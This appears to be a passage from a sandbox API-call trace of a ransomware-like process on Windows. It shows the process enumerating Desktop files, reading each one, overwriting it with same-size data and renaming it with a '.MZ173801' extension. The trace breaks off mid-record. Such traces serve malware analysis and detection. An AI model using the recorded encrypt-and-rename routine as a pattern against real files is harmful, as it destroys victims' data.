TE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.595] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.595] GetCurrentThreadId () returned 0x1358 [0123.595] GetCurrentThreadId () returned 0x1358 [0123.595] GetCurrentThreadId () returned 0x1358 [0123.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.596] GetCurrentThreadId () returned 0x1358 [0123.596] GetCurrentThreadId () returned 0x1358 [0123.596] GetCurrentThreadId () returned 0x1358 [0123.596] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\x-fqzeifd646TQM_WO.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\x-fqzeifd646tqm_wo.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.596] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.596] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.597] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xc9eb [0123.597] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.597] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xc9eb, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xc9eb, lpOverlapped=0x0) returned 1 [0123.598] CloseHandle (hObject=0x410) returned 1 [0123.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\x-fqzeifd646TQM_WO.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\x-fqzeifd646tqm_wo.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.650] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xc9eb, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0xc9eb, lpOverlapped=0x0) returned 1 [0123.652] CloseHandle (hObject=0x410) returned 1 [0123.865] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\x-fqzeifd646TQM_WO.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\x-fqzeifd646tqm_wo.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\x-fqzeifd646TQM_WO.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\x-fqzeifd646tqm_wo.mp3.mz173801")) returned 1 [0124.028] GetCurrentThreadId () returned 0x1358 [0124.028] GetCurrentThreadId () returned 0x1358 [0124.028] GetCurrentThreadId () returned 0x1358 [0124.028] GetCurrentThreadId () returned 0x1358 [0124.028] GetCurrentThreadId () returned 0x1358 [0124.028] GetCurrentThreadId () returned 0x1358 [0124.028] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8ccc10, ftCreationTime.dwHighDateTime=0x1d5eae8, ftLastAccessTime.dwLowDateTime=0xf42c7fd0, ftLastAccessTime.dwHighDateTime=0x1d5eddd, ftLastWriteTime.dwLowDateTime=0xf42c7fd0, ftLastWriteTime.dwHighDateTime=0x1d5eddd, nFileSizeHigh=0x0, nFileSizeLow=0x1460, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="X67akHe.flv", cAlternateFileName="")) returned 1 [0124.028] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.028] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.028] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\X67akHe.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\x67akhe.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8ccc10, ftCreationTime.dwHighDateTime=0x1d5eae8, ftLastAccessTime.dwLowDateTime=0xf42c7fd0, ftLastAccessTime.dwHighDateTime=0x1d5eddd, ftLastWriteTime.dwLowDateTime=0xf42c7fd0, ftLastWriteTime.dwHighDateTime=0x1d5eddd, nFileSizeHigh=0x0, nFileSizeLow=0x1460)) returned 1 [0124.029] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.029] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.029] GetCurrentThreadId () returned 0x1358 [0124.029] GetCurrentThreadId () returned 0x1358 [0124.029] GetCurrentThreadId () returned 0x1358 [0124.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.030] GetCurrentThreadId () returned 0x1358 [0124.030] GetCurrentThreadId () returned 0x1358 [0124.030] GetCurrentThreadId () returned 0x1358 [0124.030] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\X67akHe.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\x67akhe.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.031] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.031] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.031] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1460 [0124.031] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.031] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1460, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1460, lpOverlapped=0x0) returned 1 [0124.032] CloseHandle (hObject=0x410) returned 1 [0124.032] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\X67akHe.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\x67akhe.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.034] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1460, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x1460, lpOverlapped=0x0) returned 1 [0124.035] CloseHandle (hObject=0x410) returned 1 [0124.035] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\X67akHe.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\x67akhe.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\X67akHe.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\x67akhe.flv.mz173801")) returned 1 [0124.036] GetCurrentThreadId () returned 0x1358 [0124.036] GetCurrentThreadId () returned 0x1358 [0124.036] GetCurrentThreadId () returned 0x1358 [0124.036] GetCurrentThreadId () returned 0x1358 [0124.036] GetCurrentThreadId () returned 0x1358 [0124.036] GetCurrentThreadId () returned 0x1358 [0124.036] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6453c8c0, ftCreationTime.dwHighDateTime=0x1d5efb1, ftLastAccessTime.dwLowDateTime=0x22cdfed0, ftLastAccessTime.dwHighDateTime=0x1d5ea01, ftLastWriteTime.dwLowDateTime=0x22cdfed0, ftLastWriteTime.dwHighDateTime=0x1d5ea01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XDnTXxKBW", cAlternateFileName="XDNTXX~1")) returned 1 [0124.036] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c679c30, ftCreationTime.dwHighDateTime=0x1d5e13c, ftLastAccessTime.dwLowDateTime=0x9f9f16a0, ftLastAccessTime.dwHighDateTime=0x1d5ea34, ftLastWriteTime.dwLowDateTime=0x9f9f16a0, ftLastWriteTime.dwHighDateTime=0x1d5ea34, 